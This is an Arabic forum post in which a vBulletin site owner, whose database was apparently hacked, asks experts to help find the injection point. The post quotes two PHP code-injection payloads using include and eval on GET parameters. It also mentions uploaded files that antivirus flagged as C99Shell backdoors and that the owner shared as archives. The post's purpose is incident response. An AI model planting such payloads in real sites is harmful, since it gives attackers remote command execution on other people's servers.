الرجـال على كلامـه انه حاقن قاعـدة البيانات وبحثت بأكواد الحقن
اللي تستخـدم للإستثمـار والإستغـلال
وهم كود :
كود PHP:
".print include($HTTP_GET_VARS[cmd])."
وكـود آخر يستخدم للحقـن والعـادة هالأكواد تحقـن بجـدول الأسئـلة الشائعـة
أو جدول قليل استخدامـه بالملف أو ما أحد يستخدمـة مثل جدول الكلنـدر والأسئـلة
كود PHP:
{${eval($_GET[vb])}}
هـذه الأكواد اللي اعرفهـا تحقـن ومن خلالهـا يتم
الإتصـال بالقاعـدة عن طـريق ملف شـل ..
وبالمصـادفة اكتشف اربـع ملفات غـريبة على المسـار
vb/upload/1
كنت مـركب هاك المنـافع لرفع الصـور والملفات
بس حذفتـه بعـدين ..
المهم الملفات موجودة على الـرابط: رفعتهـا على تشـوفوهـا ممكن تفيد بمعـرفة وين الحقـن
1.rar - 0.07MB
..
وأشبـه ماتكون ملفات شـل لأنه صاد عنـدي الكاسبـر
سكـاي ملف med1a.php على إنه :
Backdoor.PHP.C99Shell.d
وهم ملف بعـد على المسـار
vb/upload/2/3.php
من نـوع
Backdoor.PHP.C99Shell.z
2.rar - 0.03MB
اتمنـى من الخبـراء مسـاعدتي بمعـرفة وين الحقـن
والحيـن القاعـدة عندي موجودة بس شايـل اتصالهـا